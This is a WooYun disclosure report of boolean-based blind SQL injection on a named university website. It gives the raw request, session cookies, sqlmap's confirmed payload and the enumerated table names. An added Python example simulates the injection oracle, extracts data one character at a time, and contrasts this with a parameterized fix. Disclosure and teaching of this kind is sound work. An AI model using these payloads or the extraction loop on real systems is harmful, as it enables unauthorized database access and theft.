WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader --------------- http://drop.zone.ci/
2015-11-21: Details reported to the vendor, awaiting vendor handling
2015-11-23: Vendor confirmed; details visible to the vendor only
2015-12-03: Details disclosed to core white hats and experts in the relevant field
2015-12-13: Details disclosed to regular white hats
2015-12-23: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public
SQL injection exists in multiple locations. One example follows.
GET /teacher_ky.asp?id=339 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.bs.ecnu.edu.cn
Cookie: ASPSESSIONIDCCBAADAS=MBIECIJCEFIPMPFLEIHLMOOO; CNZZDATA16822a9=1; Hm_lvt_0ba2040c6872271f07fcbf62884d6d58=1447398800; Hm_lpvt_0ba2040c6872271f07fcbf62884d6d58=1447398800; CNZZDATA3933165=cnzz_eid%3D1122643001-1447396087-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1447396087; HMACCOUNT=29C0C6C6AABFA2C0; Hm_lvt_3fe5b2b119b5fc4931e9c73e7071b0c6=1447398816; Hm_lpvt_3fe5b2b119b5fc4931e9c73e7071b0c6=1447398816; bdshare_firstime=1447398823025; BAIDUID=716ADCC0CCB6DA5BFD57CF328BE09635:FG=1
Host: www.bs.ecnu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
The id parameter is injectable (boolean-based blind, confirmed with sqlmap):
sqlmap identified the following injection point(s) with a total of 84 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=339 AND 6392=6392
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft Access

Database: Microsoft_Access_masterdb
[8 tables]
+----------+
| user     |
| admin    |
| download |
| feedback |
| market   |
| news     |
| product  |
| vote     |
+----------+
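The following is an added example, not code from the original report or from the affected site, showing why the sqlmap payload above (`id=339 AND 6392=6392`) works as a boolean oracle and how the same oracle extracts data one character at a time. It assumes the endpoint builds its query by string concatenation, the classic ASP pattern `"SELECT ... WHERE id=" & Request("id")`; the real schema and column names are not on the page, so a hypothetical `teacher` table in an in-memory SQLite database stands in for the Microsoft Access back end (against Access the character probe would use `Mid()` instead of `substr()`). The hardened handler beside it validates the type and binds the value as a parameter, which removes the oracle entirely.

```python
"""Boolean-based blind SQL injection: the probe from the report, simulated.

Added example (assumption: concatenated query, SQLite in place of Access,
hypothetical 'teacher' table). Not the affected site's code.
"""
import sqlite3
import string

# Constructed sample rows standing in for the real table contents.
_ROWS = [(339, "Teacher A"), (340, "Teacher B")]
ALPHABET = string.ascii_letters + string.digits + " "


def _db():
    """In-memory stand-in for the Access database named in the sqlmap output."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE teacher (id INTEGER PRIMARY KEY, name TEXT)")
    con.executemany("INSERT INTO teacher VALUES (?, ?)", _ROWS)
    return con


def vulnerable_lookup(con, id_param: str):
    """Hypothetical vulnerable handler: the untrusted 'id' is spliced into SQL,
    so 'id=339 AND 6392=6392' reaches the database as a WHERE clause."""
    sql = "SELECT name FROM teacher WHERE id=" + id_param  # injection point
    return [r[0] for r in con.execute(sql)]


def fixed_lookup(con, id_param: str):
    """Hardened handler: reject anything that is not an integer literal, then
    bind the value as a parameter so it can never become SQL syntax."""
    if not id_param.isdigit():
        return []
    return [r[0] for r in con.execute(
        "SELECT name FROM teacher WHERE id=?", (int(id_param),))]


def boolean_oracle(lookup, con, base_id: str, condition: str) -> bool:
    """The sqlmap technique: append 'AND <condition>' and compare the response
    with the untampered one. Same page back => the condition was true."""
    baseline = lookup(con, base_id)
    probe = lookup(con, f"{base_id} AND {condition}")
    return baseline != [] and probe == baseline


def blind_extract(lookup, con, base_id: str, subquery: str,
                  alphabet: str = ALPHABET, max_len: int = 32) -> str:
    """Recover the single value returned by 'subquery' one character at a time,
    using only the true/false oracle (this is what 'boolean-based blind' means).
    Stops when no character in the alphabet matches the next position."""
    out = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            cond = f"substr(({subquery}),{pos},1)='{ch}'"
            if boolean_oracle(lookup, con, base_id, cond):
                out += ch
                break
        else:
            break
    return out


def demo():
    """Run both handlers against the report's true/false payload pair and a
    character-by-character extraction; returns the results for checking."""
    con = _db()
    secret = "SELECT name FROM teacher WHERE id=339"
    return {
        "vuln_true": boolean_oracle(vulnerable_lookup, con, "339", "6392=6392"),
        "vuln_false": boolean_oracle(vulnerable_lookup, con, "339", "6392=6393"),
        "fixed_true": boolean_oracle(fixed_lookup, con, "339", "6392=6392"),
        "fixed_false": boolean_oracle(fixed_lookup, con, "339", "6392=6393"),
        "leaked": blind_extract(vulnerable_lookup, con, "339", secret),
        "fixed_leak": blind_extract(fixed_lookup, con, "339", secret),
    }


if __name__ == "__main__":
    print(demo())
```

Against the vulnerable handler the true and false probes produce different pages, and the extraction loop walks out the full value; against the parameterized handler both probes fall off the same validation path, so the oracle never distinguishes true from false and nothing is recovered. The cost of the blind technique is visible in the request count: each recovered character takes up to one request per alphabet symbol, which is why sqlmap needed dozens of requests just to confirm the injection point.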
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-11-23 15:18
Forwarded to the responsible secondary unit for handling
None yet